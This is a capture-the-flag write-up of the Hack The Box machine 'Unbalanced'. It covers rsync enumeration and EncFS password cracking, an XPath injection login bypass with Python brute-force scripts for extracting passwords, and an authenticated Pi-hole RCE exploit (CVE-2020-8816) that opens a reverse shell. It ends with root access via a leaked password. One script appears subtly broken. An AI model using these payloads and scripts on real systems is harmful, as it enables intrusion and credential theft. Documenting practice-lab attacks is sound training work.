Hack-The-Box-walkthrough[Unbalanced]

Posted on 2020-08-17 Edited on 2020-12-16 In HackTheBox walkthrough Views: Word count in article: 2.5k Reading time ≈ 9 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200

User Blood : InfoSecJack 00 days, 01 hours, 49 mins, 26 seconds.
Root Blood : snowscan 00 days, 02 hours, 09 mins, 09 seconds.

information gathering

first use nmap as usaul

root@kali:~# nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Rsync

root@kali:~/hackthebox/machine/unbalanced# nc -vn 10.10.10.200 873
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.200:873.
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
conf_backups    EncFS-encrypted configuration backups
@RSYNCD: EXIT
exit
Ncat: Broken pipe.

Downloading the files:

root@kali:~/hackthebox/machine/unbalanced# rsync -av rsync://10.10.10.200/conf_backups files
receiving incremental file list
created directory files
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1,452 bytes  received 411,990 bytes  10,466.89 bytes/sec
total size is 405,603  speedup is 0.98

We can see these files are encrypted:

EncFS-encrypted

After searching on how to decrypt I found the following post how to decrypt the password:

Breaking EncFS given .encfs6.xml

Getting the password:

root@kali:~# cd /usr/share/john/
root@kali:/usr/share/john# python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > /root/hackthebox/machine/unbalanced/encfs6.xml.john
root@kali:/usr/share/john# john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 --pot=s3cwalk.pot /root/hackthebox/machine/unbalanced/encfs6.xml.john
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 2020-08-20 04:24) 0g/s 61.34p/s 61.34c/s 61.34C/s alyssa..horses
0g 0:00:00:06 0.00% (ETA: 2020-08-20 09:26) 0g/s 61.53p/s 61.53c/s 61.53C/s jeffrey..jerome
0g 0:00:00:09 0.00% (ETA: 2020-08-20 11:45) 0g/s 62.60p/s 62.60c/s 62.60C/s evelyn..flores
bubblegum        (/root/hackthebox/machine/unbalanced/files/)
1g 0:00:00:11 DONE (2020-08-17 09:53) 0.08583g/s 63.17p/s 63.17c/s 63.17C/s bambam..raquel
Use the "--show" option to display all of the cracked passwords reliably
Session completed

password is: bubblegum
Reading the files:

apt-get install encfs
root@kali:~/hackthebox/machine/unbalanced# encfsctl export files decrypt
EncFS密码： 
目录decrypt不存在。
目录"decrypt" 不存在。要创建吗？(y,N) y
root@kali:~/hackthebox/machine/unbalanced# ls
decrypt  encfs6.xml.john  files
root@kali:~/hackthebox/machine/unbalanced# ls decrypt/
50-localauthority.conf              hdparm.conf                      parser.conf
50-nullbackend.conf                 host.conf                        protect-links.conf
51-debian-sudo.conf                 initramfs.conf                   reportbug.conf
70debconf                           input.conf                       resolv.conf
99-sysctl.conf                      journald.conf                    resolved.conf
access.conf                         kernel-img.conf                  rsyncd.conf
adduser.conf                        ldap.conf                        rsyslog.conf
bluetooth.conf                      ld.so.conf                       semanage.conf
ca-certificates.conf                libaudit.conf                    sepermit.conf
com.ubuntu.SoftwareProperties.conf  libc.conf                        sleep.conf
dconf                               limits.conf                      squid.conf
debconf.conf                        listchanges.conf                 sysctl.conf
debian.conf                         logind.conf                      system.conf
deluser.conf                        logrotate.conf                   time.conf
dhclient.conf                       main.conf                        timesyncd.conf
discover-modprobe.conf              mke2fs.conf                      ucf.conf
dkms.conf                           modules.conf                     udev.conf
dns.conf                            namespace.conf                   update-initramfs.conf
dnsmasq.conf                        network.conf                     user.conf
docker.conf                         networkd.conf                    user-dirs.conf
fakeroot-x86_64-linux-gnu.conf      nsswitch.conf                    Vendor.conf
framework.conf                      org.freedesktop.PackageKit.conf  wpa_supplicant.conf
fuse.conf                           PackageKit.conf                  x86_64-linux-gnu.conf
gai.conf                            pam.conf                         xattr.conf
group.conf                          pam_env.conf

then we get a lot of config files:

after enum it turns out we need the squid.conf

This is a huge file so use sed to grep only the active lines:

root@kali:~/hackthebox/machine/unbalanced# sed '/^#/ d' < decrypt/squid.conf > readable.txt
root@kali:~/hackthebox/machine/unbalanced# cat readable.txt
...
a hostname: intranet.unbalanced.htb
a password: Thah$Sh1

got a password from squid and able to see more of the config

root@kali:~/hackthebox/machine/unbalanced# squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Mon, 17 Aug 2020 15:07:05 GMT
Content-Type: text/plain;charset=utf-8
Expires: Mon, 17 Aug 2020 15:07:05 GMT
Last-Modified: Mon, 17 Aug 2020 15:07:05 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 9
FQDNcache Entries Cached: 8
FQDNcache Requests: 96
FQDNcache Hits: 0
FQDNcache Negative Hits: 0
FQDNcache Misses: 96
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters

Web/proxy

访问

1	http://10.10.10.200:3128/

squid is running on port 3128

now setup the proxy and try to see if we can see the webpage

intranet.unbalanced.htb
configure foxy proxy:

set the browser to http protocal, ip 10.10.10.200, port 3128

after set up those configures, we can access the following webpage:

1	http://intranet.unbalanced.htb/intranet.php

after some enum we couldn’t find anything interesting but when look back at the squid config we can see something odd

1 2	172.31.179.2 H -001 1 intranet-host2.unbalanced.htb 172.31.179.3 H -001 1 intranet-host3.unbalanced.htb

number one is missing,when we go to

1	http://172.31.179.1

we get the following:

1	Host temporarily taken out of load balancing for security maintenance.

turns out this one is running, but not in the load balance and as we can see this is for a reason.

1	http://172.31.179.1/intranet.php

get the same page, but the login form here is vulnerable to xpath injection:

payload

'or''='

then we got the following things on the page:

rita
Rita Fubelli
rita@unbalanced.htb
Role: HR Manager

jim
Jim Mickelson
jim@unbalanced.htb
Role: Web Designer

bryan
Bryan Angstrom
bryan@unbalanced.htb
Role: System Administrator

sarah
Sarah Goodman
sarah@unbalanced.htb
Role: Team Leader

with the following injection we are able to bruteforce our password
in the password field:

1	'or substring(Password,1,1)='p' or'

So everyone that has the first letter p in the password will now be displayed on the page:

write a python script to bruteforce the password, the payload must be single character at a time

crack.py

import requests

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita','jim','bryan','sarah']

for user in u:
    data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
    request = requests.post(url, data=data, proxies={'http':proxy_url})
    b = len(request.text)
    cracked_pass = ''
    for i in range(1,80):
        found = False
        for c in w:
            data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c + ""}
            request = requests.post(url, data=data, proxies={'http':proxy_url})
            if len(request.text) != b:
                found = True
                break
        if not found:
            break
        print('Attempting User {0}'.format(user))
    print('[+]Found character: {2}'.format(user, i, c))
    cracked_pass += c
    print(cracked_pass)

or crack1.py script

import requests

url = "http://172.31.179.1/intranet.php"
proxy = "http://10.10.10.200:3128"
letters = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%"
users = ['sarah', 'rita', 'jim', 'bryan']

for user in users:
	data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,1,1)='p' or'"}
	request = requests.post(url, data=data, proxies={'http':proxy})	
	length = len(request.text)	
	p4ss = ''
	for i in range(1,25):		
		for l in letters:			
			data = {"Username": '', "Password": "' or username= '" + "{}".format(user) + "'or substring(Password,{},1)='{}' or'".format(str(i),l)}
			request1 = requests.post(url, data=data, proxies={'http':proxy})
			if "{}@unbalanced.htb".format(user) in request1.text and len(request1.text) != 6756:
				print("Got hit for User '{}' - Letter is '{}'".format(user, l))
				p4ss += l
				print(str(i))
				print(str(p4ss))
				pass

use burp intruder to bruteforce is also a great idea,

burp setup reference to

sevwalk’s unbalanced walkthrough

after run those scripts, we got:

rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'

after tried them all, we got bryan user loged in to ssh

and get the user flag

root@kali:~# ssh bryan@10.10.10.200
The authenticity of host '10.10.10.200 (10.10.10.200)' can't be established.
ECDSA key fingerprint is SHA256:aiHhPmnhyt434Qvr9CpJRZOmU7m1R1LI29c11na1obY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.200' (ECDSA) to the list of known hosts.
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 17 14:16:06 2020 from 10.10.10.4
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ whoami
bryan
bryan@unbalanced:~$ ls
TODO  user.txt
bryan@unbalanced:~$ cat user.txt
51dfe0d5a9a3981ca4fdbfee0619d773

Privilege Escalation

bryan@unbalanced:~$ cat TODO 
############                                                                                         
# Intranet #                                                                                         
############                                                                                         
* Install new intranet-host3 docker [DONE]                                                           
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]                                  
* Test intranet-host3 [DONE]                                                                         
* Add intranet-host3 to load balancer [DONE]                                                         
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

There was a suspicious TODO file in Bryan’s home folder.
What is in progress is vulnerable.
As it is, PiHole might be the hold for privilege escalation.
PiHole server is running in docker and it can be only accessed through the localhost. Let’s find which port it is running.

bryan@unbalanced:~$ ss -lnpt | grep 127.0.0.1
LISTEN    0         128              127.0.0.1:8080             0.0.0.0:*       
LISTEN    0         128              127.0.0.1:5553             0.0.0.0:*       
bryan@unbalanced:~$ curl http://127.0.0.1:5553/
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080/
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

seems like I need to find a domain for the PiHole server.
Then ran the linpeas enumeration script on the server.

172.31.179.2 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:02 STALE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.179.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:03 STALE
10.10.10.2 dev ens160 lladdr 00:50:56:b9:f9:ab REACHABLE
fe80::250:56ff:feb9:f9ab dev ens160 lladdr 00:50:56:b9:f9:ab router STALE

looks like we found the ip of the pi-hole webpage

bryan@unbalanced:~$ curl 172.31.11.3

    <html><head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
        <link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
    </head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>

turn on the proxy again , see the webpage and are able to login in with the default creds:

1	http://172.31.11.3/admin/

Found the following exploit for pi-hole:

Pi-hole 4.4.0 - Remote Code Execution (Authenticated)

Since the exploit is not configured to use a proxy server

we can do two things change the exploit or use ssh tunneling

1	ssh -L 81:172.31.11.3:80 bryan@10.10.10.200

then browser to

1	http://127.0.0.1:81/admin/

use the poc from github

CVE-2020-8816

run the script then we got a reverse shell

root@kali:~/hackthebox/machine/unbalanced# python exp2.py http://127.0.0.1:81 admin 10.10.14.5 3344
Attempting to verify if Pi-hole version is vulnerable
Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload

root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.200.
Ncat: Connection from 10.10.10.200:38602.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Boom! get a shell on the docker

Privilege Escalation–Information Disclosure–Root:

found password in script file

1	bUbBl3gUm$43v3Ry0n3!

$ cd /root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb

then we use the password to get root

wow! easy root!

bryan@unbalanced:~$ su root
Password: 
root@unbalanced:/home/bryan# cd
root@unbalanced:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:~# whoami
root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root
cat: root: No such file or directory
root@unbalanced:~# cat root.txt 
9c9972cb01af0521dc17b015c30103c3